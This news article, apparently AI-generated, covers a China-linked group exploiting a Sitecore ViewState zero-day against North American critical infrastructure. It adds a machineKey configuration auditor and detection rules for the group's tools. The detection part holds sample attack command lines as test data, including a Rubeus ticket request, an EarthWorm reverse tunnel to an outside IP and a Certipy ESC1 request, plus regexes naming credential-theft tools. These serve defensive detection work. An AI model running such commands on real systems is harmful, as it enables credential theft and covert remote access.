Ethical Hacking News
Threat actors aligned with China have been exploiting a zero-day vulnerability in the Sitecore web content management platform, tracked as CVE-2025-53690 (CVSS 9.0), in attacks on critical infrastructure organizations in North America. Cisco Talos attributes the activity to UAT-8837, which it assesses with medium confidence to be a China-nexus advanced persistent threat (APT) actor based on tactical overlaps with other campaigns from the region. The group's role appears to be obtaining initial access to high-value targets and then using mostly open-source tooling to harvest credentials, security configurations, and Active Directory data. The report lands in the same week that Western governments issued fresh warnings about threats to operational technology (OT) environments.
China-aligned threat actors have been observed targeting critical infrastructure sectors in North America, leveraging a newly discovered zero-day in the Sitecore web content management platform. The activity, attributed to a group Cisco Talos tracks as UAT-8837, uses advanced persistent threat (APT) tradecraft to obtain initial access to high-value organizations.
According to Cisco Talos, UAT-8837 appears to be tasked primarily with obtaining initial access to critical infrastructure organizations in North America. Once inside, it predominantly deploys open-source tools to harvest credentials, security configurations, and domain and Active Directory (AD) information, and then uses what it has collected to establish multiple independent channels of access to the victim.
The attack vector employed by UAT-8837 is a critical zero-day in Sitecore, CVE-2025-53690 (CVSS 9.0). The flaw stems from a sample ASP.NET machine key that appeared in Sitecore deployment guides; a deployment that kept that key lets a remote attacker forge ViewState and execute arbitrary code on the server, which is the entry point for everything that follows. The intrusion observed by Cisco Talos shares TTPs, tooling, and infrastructure with a campaign detailed by Google-owned Mandiant in September 2025, when in-the-wild exploitation of the flaw was first reported.
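Because the root cause is static, publicly documented key material rather than a code bug in a single page, the check a defender wants is on the configuration. The script below is an added example, not Sitecore's, Mandiant's or Cisco Talos's code: it parses an ASP.NET web.config, flags a machineKey that reuses key material the operator knows to be shared or published, deprecated validation or decryption algorithms, keys shorter than Microsoft's recommended lengths, and a disabled ViewState MAC, and shows the remediation of emitting fresh per-deployment keys. The values in KNOWN_SHARED_KEYS and both config fragments are constructed placeholders; the real sample key from the deployment guides is deliberately not reproduced.

```python
import secrets
import xml.etree.ElementTree as ET

# Constructed placeholders standing in for key material the operator knows to be
# published or shared (e.g. copied from vendor documentation). They are NOT the
# real sample key from Sitecore's deployment guides.
SAMPLE_VALIDATION_KEY = "0123456789ABCDEF" * 8   # 128 hex chars
SAMPLE_DECRYPTION_KEY = "FEDCBA9876543210" * 4   # 64 hex chars
KNOWN_SHARED_KEYS = {SAMPLE_VALIDATION_KEY, SAMPLE_DECRYPTION_KEY}

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}


def audit_machine_key(web_config_xml: str) -> list[str]:
    """Return findings for the <machineKey> in an ASP.NET web.config.

    An empty list means none of the checked weaknesses were present: reuse of a
    key in KNOWN_SHARED_KEYS, deprecated validation/decryption algorithms, keys
    shorter than Microsoft's recommended length, and ViewState MAC disabled.
    """
    findings: list[str] = []
    root = ET.fromstring(web_config_xml)

    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append('enableViewStateMac="false": ViewState integrity checking is off')

    mk = root.find("./system.web/machineKey")
    if mk is None:
        # No explicit element: ASP.NET auto-generates per-machine keys, which is
        # fine on a single node (a web farm still needs explicit, unique keys).
        return findings

    known = {k.upper() for k in KNOWN_SHARED_KEYS}
    # (attribute, recommended hex length): 64-byte validation key, 32-byte AES key
    for attr, min_hex in (("validationKey", 128), ("decryptionKey", 64)):
        value = mk.get(attr, "AutoGenerate")
        if value.upper().startswith("AUTOGENERATE"):
            continue  # auto-generated per machine: not a static secret that can leak
        if value.upper() in known:
            findings.append(f"{attr} matches a known shared/sample key: rotate it")
        if len(value) < min_hex:
            findings.append(f"{attr} is {len(value)} hex chars; {min_hex} recommended")

    if mk.get("validation", "HMACSHA256").upper() not in STRONG_VALIDATION:
        findings.append(f"validation={mk.get('validation')!r}: use HMACSHA256 or stronger")
    if mk.get("decryption", "Auto").upper() not in {"AUTO", "AES"}:
        findings.append(f"decryption={mk.get('decryption')!r}: use AES")
    return findings


def fresh_machine_key_element() -> str:
    """Remediation: a <machineKey> with newly generated, per-deployment keys."""
    return (
        f'<machineKey validationKey="{secrets.token_hex(64).upper()}" '
        f'decryptionKey="{secrets.token_hex(32).upper()}" '
        'validation="HMACSHA256" decryption="AES" />'
    )


def wrap(machine_key_element: str) -> str:
    """Constructed minimal web.config around a <machineKey> element."""
    return f"<configuration><system.web>{machine_key_element}</system.web></configuration>"


# Constructed 'before' config: a copied sample key plus a deprecated MAC algorithm.
VULNERABLE_CONFIG = wrap(
    f'<machineKey validationKey="{SAMPLE_VALIDATION_KEY}" '
    f'decryptionKey="{SAMPLE_DECRYPTION_KEY}" validation="SHA1" decryption="AES" />'
)
# 'After' config: fresh keys, HMACSHA256, AES.
HARDENED_CONFIG = wrap(fresh_machine_key_element())

if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_machine_key(cfg) or "no findings")
```

Rotating the key invalidates existing ViewState and forms-authentication tickets, so do it in a maintenance window, and on a web farm every node must receive the same newly generated pair; a key that is unique per deployment but still shared across nodes is the goal, not auto-generation on each box.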
UAT-8837 also brought a set of post-exploitation tools to the intrusion, nearly all of them open source: GoTokenTheft, a tool for stealing access tokens; EarthWorm, a SOCKS proxy that builds a reverse tunnel to attacker-controlled servers; DWAgent, a remote-administration agent abused for persistent remote access and AD reconnaissance; SharpHound, the BloodHound collector used to map Active Directory relationships; Impacket, whose scripts let the actor run commands on remote hosts with the privileges of captured credentials; GoExec, a Golang-based tool for executing commands on other endpoints inside the victim's network; Rubeus, a C# toolset for Kerberos interaction and abuse; and Certipy, which enumerates and abuses Active Directory Certificate Services (AD CS). Because these tools are freely available and several of them (DWAgent, Impacket, SharpHound) also have legitimate administrative uses, their presence is an indicator to triage in context rather than something to treat as malware on sight.
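To turn that tool list into something a SOC can run, the following added example (my code, not Talos's detection content) applies a small rule set to process-creation events. The rules key on each tool's argument syntax rather than its file name, because a renamed Rubeus or SharpHound binary still has to pass its usual arguments; it also adds a parent/child heuristic for the IIS worker process w3wp.exe spawning an interpreter, which is how server-side code execution through an ASP.NET CMS such as Sitecore typically surfaces. The regexes are my assumptions about each tool's common command lines, the hostnames and event lines are constructed, and the IP addresses are documentation ranges.

```python
import json
import re

# Regexes are my assumptions about each tool's typical argument syntax (not
# Talos's published indicators). Where a rule keys on arguments, a renamed
# binary still matches; the name-only rules are weaker by design.
RULES = {
    "sharphound": re.compile(r"(?i)(sharphound|--collectionmethods?\s+all\b|\s-c\s+all\b)"),
    "rubeus": re.compile(r"(?i)(\brubeus\b|\b(asktgt|asktgs|kerberoast|asreproast|s4u|tgtdeleg)\b)"),
    "certipy": re.compile(r"(?i)(\bcertipy\b|(?=.*-dc-ip\b)(?=.*-(template|pfx)\b))"),
    # Sysinternals PsExec also trips this rule: expect to triage it.
    "impacket": re.compile(r"(?i)\b(wmiexec|smbexec|atexec|dcomexec|secretsdump|psexec)(\.py)?\b"),
    "earthworm": re.compile(r"(?i)-s\s+(rcsocks|rssocks|ssocksd|lcx_tran|lcx_listen|lcx_slave)\b"),
    "dwagent": re.compile(r"(?i)dwagent|dwagsvc"),          # legitimate software; flag where unexpected
    "goexec_or_gotokentheft": re.compile(r"(?i)\b(goexec|gotokentheft)\b"),  # name only
}

# The IIS worker process spawning an interpreter is how code execution on an
# ASP.NET application typically shows up in process telemetry.
IIS_WORKER = "w3wp.exe"
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
                  "bitsadmin.exe", "rundll32.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def classify(event: dict) -> list[str]:
    """Return the names of every rule a single process-creation event trips."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    if basename(event.get("ParentImage", "")) == IIS_WORKER and basename(event.get("Image", "")) in SHELL_CHILDREN:
        hits.append("iis_worker_spawned_shell")
    return hits


def scan(jsonl: str) -> list[dict]:
    """Run every rule over newline-delimited JSON events; keep only the alerts."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        hits = classify(event)
        if hits:
            alerts.append({"host": event.get("Computer"), "image": event.get("Image"), "rules": hits})
    return alerts


# Constructed Sysmon-style process-creation events (hosts, paths and values invented).
SAMPLE_EVENTS = r"""
{"Computer": "WEB01", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}
{"Computer": "WEB01", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\Temp\\svc.exe", "CommandLine": "svc.exe asktgt /user:svc_backup /rc4:9A3D1C5F7B2E4A6C8D0F1E2B3C4D5A6F /ptt"}
{"Computer": "WEB01", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Users\\Public\\ew.exe", "CommandLine": "ew.exe -s rssocks -d 203.0.113.10 -e 8888"}
{"Computer": "FS02", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Program Files\\DWAgent\\native\\dwagsvc.exe", "CommandLine": "\"C:\\Program Files\\DWAgent\\native\\dwagsvc.exe\" run"}
{"Computer": "FS02", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs -p"}
{"Computer": "WS17", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Python311\\python.exe", "CommandLine": "python.exe C:\\tools\\c.py req -u j.doe@corp.local -p Passw0rd -dc-ip 10.0.0.5 -ca corp-CA -template ESC1"}
{"Computer": "WS17", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Users\\Public\\sh.exe", "CommandLine": "sh.exe --collectionmethods All --zipfilename out.zip"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Note that the renamed binaries (svc.exe for Rubeus, c.py for Certipy, sh.exe for SharpHound) are still caught, while the benign svchost.exe line is not; the name-only rules for DWAgent, GoExec and GoTokenTheft will miss a renamed copy, so pair them with the network and service-creation telemetry those tools generate.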
Cisco Talos assesses UAT-8837 to be a China-nexus APT actor with medium confidence, based on tactical overlaps with other campaigns mounted by threat actors from the region. The intrusion adds to concerns about Chinese threat actors targeting critical infrastructure in North America and underlines the need for organizations in those sectors to secure their networks proactively rather than after a compromise.
In recent years, Western governments have issued several alerts regarding threats to operational technology (OT) environments. This week, cybersecurity and intelligence agencies from Australia, Germany, the Netherlands, New Zealand, the U.K., and the U.S. warned about growing threats to OT environments, urging organizations to limit exposure, centralize and standardize network connections, use secure protocols, harden OT boundaries, ensure all connectivity is monitored and logged, and avoid using obsolete assets that could heighten security risks.
The guidance comes as threats to operational technology continue to rise, with state-sponsored actors actively targeting critical national infrastructure (CNI) networks. The threat is not limited to state-sponsored actors, with opportunistic attackers also exploiting insecure OT infrastructure.
In light of these developments, security and risk management professionals responsible for critical infrastructure should prioritize patching and hardening internet-facing systems such as Sitecore, monitoring for the post-exploitation tooling described above, and applying the newly issued OT connectivity guidance.
Related Information:
https://www.ethicalhackingnews.com/articles/A-New-Era-of-Cyber-Warfare-China-Linked-APT-Exploits-Sitecore-Zero-Day-in-Attacks-on-American-Critical-Infrastructure-ehn.shtml
https://thehackernews.com/2026/01/china-linked-apt-exploits-sitecore-zero.html
https://nvd.nist.gov/vuln/detail/CVE-2025-53690
https://www.cvedetails.com/cve/CVE-2025-53690/
Published: Fri Jan 16 02:59:11 2026 by llama3.2 3B Q4_K_M